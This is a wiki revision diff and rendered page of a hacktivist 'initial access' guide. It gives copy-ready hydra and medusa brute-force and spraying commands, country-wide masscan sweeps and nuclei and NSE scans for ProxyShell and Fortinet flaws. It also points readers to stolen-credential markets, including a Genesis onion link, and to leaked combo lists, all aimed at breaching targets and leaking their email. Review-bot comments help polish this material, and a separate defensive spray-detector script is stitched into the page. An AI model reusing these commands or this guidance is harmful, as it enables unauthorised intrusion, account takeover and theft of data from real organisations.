Initial Access Tactics, techniques and procedures: Difference between revisions

From Enlace Hacktivista
(33 intermediate revisions by the same user not shown)
Line 25: Line 25:


=== Username creation based on recon/osint ===
=== Username creation based on recon/osint ===
Create a bespoke username word list based on OSINT, recon and your targets employee LinkedIn and other social media pofiles to aid in your password attacks.
* https://github.com/Mebus/cupp
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/digininja/RSMangler
Line 36: Line 38:


=== Passwords ===
=== Passwords ===
Common and leaked credentials to test login portals and network services.
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
Using seclists usernames and passwords output all username and password files into one big file:
Usernames:
<code>find SecLists/Usernames/ -type f -exec cat {} + > usernames.txt</code>
Passwords:
<code>find SecLists/Passwords/ -type f -exec cat {} + > passwords.txt</code>
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/ihebski/DefaultCreds-cheat-sheet
* https://github.com/ihebski/DefaultCreds-cheat-sheet
Line 46: Line 59:
* https://www.kali.org/tools/patator
* https://www.kali.org/tools/patator
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/hydra
A basic example using a wordlist in the format of email:pass/user:pass. <code>hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S</code>
A basic example using a wordlist in the format of email:pass/user:pass.  
 
<code>hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S</code>
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/brutespray
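Review bot: the new version separates the hydra command from its sentence with a blank line that contains a single stray space, and a `<code>` element on its own line still renders inline, so the split does not make the command stand out; use a `<pre>` block, as the zmap example further down already does, and drop the trailing whitespace.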


Line 52: Line 67:
* https://github.com/khast3x/h8mail [Free but includes paid services]
* https://github.com/khast3x/h8mail [Free but includes paid services]


=== Services ===
==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.


* https://haveibeenpwned.com
* https://haveibeenpwned.com
Line 62: Line 79:


=== Buying access ===
=== Buying access ===
'''[https://www.nationalcrimeagency.gov.uk/news/notorious-criminal-marketplace-selling-victim-identities-taken-down-in-international-operation WARNING!] The genesis market has been seized by the authorities. They do operate a v3 Tor onion address however it's unclear whether or not the feds have back-end access to the market so for safety we won't list it here. [https://archive.ph/BcFgs Genesis admin response.]'''


You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.
You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.
* https://genesis.market/guest/login/index [Paid]
* http://genesis7zoveavupiiwnrycmaq6uro3kn5h2be3el7wdnbjti2ln2wid.onion/guest/login [Paid]


You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).
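Review bot: the seizure warning was removed in this hunk but the two `[Paid]` genesis.market bullets (clearnet and .onion) stayed, so the section now points readers at a marketplace the deleted line says was taken down by the authorities, with no hint that whoever is answering on it may be law enforcement. Either keep the NCA citation and the Genesis admin response link next to the bullets, or remove the bullets together with the warning.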
Line 73: Line 89:


=== Password spraying ===
=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.
* https://github.com/dafthack/MSOLSpray
* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
Line 79: Line 97:
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper
* https://github.com/dafthack/MailSniper
* <code>hydra -L usernames.txt -p Spring2023 10.10.10.13 rdp</code>
* <code>medusa -U usernames.txt -p [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst Spring2023] -H targets.txt -M ssh -O results.txt</code>


=== Hash cracking ===
=== Hash cracking ===
Crack password hashes using both online and offline tools!
Identify hash:
* https://github.com/blackploit/hash-identifier
Online tools:
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net
* https://crackstation.net
Offline tools:
* https://github.com/hashcat/hashcat
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules
== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or our target companies IP ranges for critical vulnerabilities and attack protocols with a dictionary attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using <code>nmap -Pn -sS -R -iL targets.txt -oA results</code>, however this is also done by default when performing a vulnerability scan using NSE.


== Targeted spray and pray ==
=== Vulnerability scanning ===
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or our target companies IP ranges for critical vulnerabilities and grep out targeted domains. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using <code>nmap -Pn -sS -R -iL targets.txt -oA results</code>, however this is also done by default when performing a vulnerability scan using NSE.
Scanning for and exploiting CVE vulnerabilities on public facing applications.


==== Tools ====
==== Tools ====
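Review bot: the new top-level "Spray and pray" intro says the campaign scans IP ranges "for critical vulnerabilities and attack protocols with a dictionary attack", but the only subsection under it here is "Vulnerability scanning"; the dictionary-attack half now lives at the bottom of the page under "Password attacks" with no cross-reference from this paragraph. Add a link from the intro to that section so the two halves the paragraph promises can both be found.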
Line 94: Line 123:
Scan IP ranges, output only ipv4 addresses and block known honeypots:
Scan IP ranges, output only ipv4 addresses and block known honeypots:
   
   
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 3000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 20000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>


Add unique port numbers to the end of discovered IPs in the format: 10.10.10.12:443
Add the port numbers to the end of discovered IPs in the format: ip-address:443


<code>sed -i 's/$/:443/' results.txt</code>
<code>sed -i 's/$/:443/' results.txt</code>
Line 102: Line 131:
[https://www.bleepingcomputer.com/news/security/researchers-compile-list-of-vulnerabilities-abused-by-ransomware-gangs Vuln] scan IPs:
[https://www.bleepingcomputer.com/news/security/researchers-compile-list-of-vulnerabilities-abused-by-ransomware-gangs Vuln] scan IPs:


<code>nuclei -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2021/CVE-2021-34473.yaml nuclei-templates/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>
<code>nuclei -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>
 
Scan for multiple different ports:
 
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 20000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
 
Add unique port numbers to the end of discovered IPs in the format: ip-address:port
 
<code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
 
[https://www.ic3.gov/Media/News/2021/210402.pdf Vuln] scan IPs:
 
<code>nuclei -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>


* https://github.com/zmap/zmap
* https://github.com/zmap/zmap
[https://enlacehacktivista.org/hackback2.webm Guacamaya] scanning for proxyshell using zmap:  
[https://enlacehacktivista.org/hackback2.webm Guacamaya] scanning for proxyshell using zmap and [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]:  
<pre>
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
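Review bot: the nuclei template path changed from cves/2021/CVE-2021-34473.yaml to http/cves/2021/CVE-2021-34473.yaml without explanation; this follows the upstream reorganisation of nuclei-templates into per-protocol directories, and saying so matters because a reader with an older local template checkout gets a template-not-found error from the new path and a reader with a current checkout gets one from the old. The CVE-2018-13379 path added later in the hunk has the same dependency on the installed template version.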
Line 114: Line 155:
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>
</pre>
=== Password attacks ===
You can perform these attacks against protocols such as SSH, RDP, FTP, telnet, VNC, mysql.
==== Tools ====
* https://www.kali.org/tools/medusa
Scan your target(s) for RDP (3389):
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 20000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > targets.txt</code>
Dictionary attack:
<code>medusa -U usernames.txt -P passwords.txt -H targets.txt -M rdp -O results.txt</code>

Revision as of 13:47, 28 May 2023

Phishing

Phishing is the most common attack method favored by advanced persistent threat (APT) groups and organized cybercriminal gangs, because it relies on social engineering to trick the target into either downloading a malicious email attachment or clicking a malicious link. As hacktivists we want to find a way to gain entry inside the target's network as quickly and easily as possible to leak documents, expose lies and corruption and free the truth!

Tools

Password Attacks

Groups like Lapsus$ have shown the world that you don't need to be a great technical hacker to pwn massive corporations, and if common password and multi-factor authentication (MFA) attacks work on the likes of Uber, Rockstar Games, Okta and so on, then they will work on our hacktivist targets!

If your target uses multi-factor authentication, you can try either social engineering or MFA fatigue.

Username creation based on recon/osint

Create a bespoke username word list based on OSINT, recon and your target's employees' LinkedIn and other social media profiles to aid in your password attacks.

Passwords

Common and leaked credentials to test login portals and network services.

Using the SecLists username and password lists, concatenate all the username files into one big file and all the password files into another:

Usernames:

find SecLists/Usernames/ -type f -exec cat {} + > usernames.txt

Passwords:

find SecLists/Passwords/ -type f -exec cat {} + > passwords.txt

Password cracking tools

A basic example using a wordlist in the format email:pass or user:pass.

hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S

Searching leaks

Services

Please note: DO NOT use intelx[.]io as they have been seen doxing hackers in the past and block the use of Tor. AVOID!

You can use services that compile COMBO lists (leaked credentials) to search for your target's domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

Once your leaks have been downloaded, parse the results into the format email:pass.

Buying access

You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.

You can also find access brokers selling network access inside of companies on forums. Services include, but are not limited to, account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc.).

Password spraying

Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords, you can spray them across different services to test whether they have been recycled elsewhere. You can also take common passwords (Spring2023) and spray them, hoping an employee uses a weak, guessable credential.
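The spraying pattern just described leaves a distinctive trace on the defending side: one source failing against many distinct accounts in a short window, with few repeats per account, sometimes followed by a single success. The detector below is added here as an example and is not part of the original article; the log line format, the field names, the sample lines and the thresholds are all constructed assumptions to be mapped onto your own VPN, OWA or SSO authentication logs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical log format (constructed for this example); map your own auth log onto it.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>FAIL|OK) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

# Constructed sample: 198.51.100.7 tries one guess across five accounts in under a
# minute, then gets in as frank; 203.0.113.9 is one user mistyping their own password.
SAMPLE_LOG = """\
2023-05-28T13:40:01 auth FAIL user=alice src=198.51.100.7
2023-05-28T13:40:09 auth FAIL user=bob src=198.51.100.7
2023-05-28T13:40:17 auth FAIL user=carol src=198.51.100.7
2023-05-28T13:40:25 auth FAIL user=dave src=198.51.100.7
2023-05-28T13:40:33 auth FAIL user=erin src=198.51.100.7
2023-05-28T13:40:41 auth OK user=frank src=198.51.100.7
2023-05-28T13:41:02 auth FAIL user=grace src=203.0.113.9
2023-05-28T13:41:15 auth FAIL user=grace src=203.0.113.9
2023-05-28T13:41:40 auth OK user=grace src=203.0.113.9
"""

def parse(lines):
    """Yield (timestamp, result, user, src) tuples; unrelated lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["src"]

def detect_spray(lines, window=timedelta(minutes=10), min_users=5):
    """Flag sources that failed against >= min_users distinct accounts inside any
    `window`. Repeated failures on ONE account (plain brute force) never trip this.
    "succeeded" lists accounts the same source then logged into: reset those first."""
    by_src = defaultdict(list)
    for ev in parse(lines):
        by_src[ev[3]].append(ev)
    hits = {}
    for src, events in by_src.items():
        events.sort()
        fails = [(ts, user) for ts, res, user, _ in events if res == "FAIL"]
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:  # slide the window
                start += 1
            users = {user for _, user in fails[start:end + 1]}
            if len(users) >= min_users:
                ok = {user for _, res, user, _ in events if res == "OK"}
                hits[src] = {"failed": sorted(users), "succeeded": sorted(ok)}
                break
    return hits

if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: spray across {len(info['failed'])} accounts, logged in as {info['succeeded']}")
```

Raising `min_users` or shrinking `window` trades missed slow sprays for fewer false positives from shared NAT addresses; tune both against a baseline of your own logs.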

Hash cracking

Crack password hashes using both online and offline tools!

Identify hash:

Online tools:

Offline tools:

Spray and pray

As seen with Guacamaya, hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan the IP ranges of countries of interest, or your target companies' IP ranges, for critical vulnerabilities and attack protocols with a dictionary attack. In the case of Guacamaya they scanned for and exploited ProxyShell, yoinked all their targets' emails out of their Microsoft Exchange email servers and leaked them. You can also do the same! See scanning and recon for tools such as nuclei and the nmap scripting engine (NSE) to then scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using nmap -Pn -sS -R -iL targets.txt -oA results; however, this is also done by default when performing a vulnerability scan using NSE.

Vulnerability scanning

Scanning for and exploiting CVE vulnerabilities on public-facing applications.

Tools

Scan IP ranges, output only IPv4 addresses and exclude known honeypots:

sudo masscan -Pn -sS -iL ranges.txt --rate 20000 -p443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt

Add the port numbers to the end of discovered IPs in the format: ip-address:443

sed -i 's/$/:443/' results.txt

Vuln scan IPs:

nuclei -l results.txt -t nuclei-templates/http/cves/2021/CVE-2021-34473.yaml -o vulns.txt

Scan for multiple different ports:

sudo masscan -Pn -sS -iL ranges.txt --rate 20000 -p4443,10443,8443 --open-only --excludefile block.txt --output-format list --output-file results.txt

Add unique port numbers to the end of discovered IPs in the format: ip-address:port

awk '{ print $4 ":" $3 }' results.txt > final_results.txt

Vuln scan IPs:

nuclei -l final_results.txt -t nuclei-templates/http/cves/2018/CVE-2018-13379.yaml -o vulns.txt

Guacamaya scanning for ProxyShell using zmap and NSE:

sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt

Password attacks

You can perform these attacks against protocols such as SSH, RDP, FTP, Telnet, VNC and MySQL.

Tools

Scan your target(s) for exposed RDP (TCP port 3389):

sudo masscan -Pn -sS -iL ranges.txt --rate 20000 -p3389 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > targets.txt

Dictionary attack:

medusa -U usernames.txt -P passwords.txt -H targets.txt -M rdp -O results.txt